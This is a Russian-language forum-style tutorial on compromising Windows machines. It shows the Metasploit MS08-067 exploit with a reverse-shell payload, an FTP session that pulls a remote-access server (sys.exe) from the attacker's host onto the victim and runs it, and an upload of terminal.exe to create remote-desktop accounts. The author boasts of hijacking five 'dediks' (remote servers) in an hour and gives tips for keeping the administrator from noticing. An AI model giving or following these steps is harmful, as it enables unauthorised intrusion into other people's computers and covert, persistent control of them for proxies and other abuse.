Затем в Метасплойт в дальшейшем МС , находим эксплойт MS08-067_netapi жмём выполнить ,

Выбор цели Автомат , Payloads =generic/shell_reverse_tcp в RHOST ip жертвы и жмём применить , если уязвимость существует вы получите шелл (cmd.exe) удалённого компьютера , а в окошке Sessions появиться ip жертвы

Предположим что FTP сервер у нас установлен и настроен , в cmd пишем

 
 C:\>ftp 
 ftp> o 
 К 10.xx.xx.xx 
 Связь с 10.xx.xx.xx . 
 220 Welcome to 10.xx.xx.xx FTP service. 
 Пользователь (10.xx.xx.xx :(none)): anonymous 
 230 Login successful. 
 ftp>

 
 get sys.exe 
 bye

смотрим залит ли файл

и запускаем его

Теперь запустим RadminViewer и пробуем приконектится к нашему залитому и запущенному радмин-серверу

Замечательно конект есть , вбиваем наш пароль и вот мы дома

Теперь в радмине выбираем режим "Передачи файлов и загружаем наш terminal.exe , который сделает нам дедик на этом компьютере , хотя можно сделать учётки и в ручную

Далее радмином в режиме "Телнет " запустим наш terminal.exe

Затем "Подключение к удаленному рабочему столу" и пробуем приконектимся к нашему свежеиспечёному дедику

Как видите на скрине показанно , что если мы сейчас нажём "ДА" то админа может выкинуть из свой сессии , и он может заподозрить что то не ладное в своей системе , как правило это может , повторяют может лечиться перезагрузкой компьютера , но помогает не всегда ! 50/50

Вы спросите почему я сразу не залил terminal.exe , отвечаю буквы в шелле отображаются кракозябрами и скорость в дедике сами понимаете , так что мне важно был залить радмина , а там уже дело техники

Ну вот у нас есть дедик , на нём мы может установить прокси , фпт и многое многое другое , примерно в течении часа получилось 5 дедиков , я думаю это не плохо !

Подробно про Метасплойт и эксплойты можно почитать тут http://www.metasploit.com/